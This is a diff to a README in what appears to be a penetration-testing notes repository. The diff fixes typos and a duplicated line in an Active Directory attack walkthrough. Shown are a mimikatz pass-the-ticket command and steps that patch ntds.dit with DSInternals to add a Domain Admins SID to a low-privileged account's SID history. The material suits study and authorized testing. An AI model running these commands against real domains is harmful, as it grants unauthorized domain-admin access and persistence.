seeu-inspace/easyg/active-directory/README.md

 6. Load the TGT to auth to DC, with mimikatz
    - `kerberos::ptt administrator.kirbi`

-### Trough SID History
+### Through SID History

 - If you need to fix SID history (ntds.dit): [DSInternals](https://github.com/MichaelGrafnetter/DSInternals)
 1. Confirm that your user has no SID history
    - `Get-ADUser <your ad username> -properties sidhistory,memberof`
 2. Get the SID of the Domain Admins
-   - `Get-ADGroup "Domain Admins"Get-ADGroup "Domain Admins"`
+   - `Get-ADGroup "Domain Admins"`
 3. Patch the ntds.dit file with DSInternals
    - `Stop-Service -Name ntds -force`
-   - `Stop-Service -Name ntds -force`
-   - `Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit`
+   - `Add-ADDBSidHistory -SamAccountName 'username of our low-privileged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit`
    - `Start-Service -Name ntds`
    - `Restart-Service -Name NTDS`
 4. Exit and Log in, verify the SID history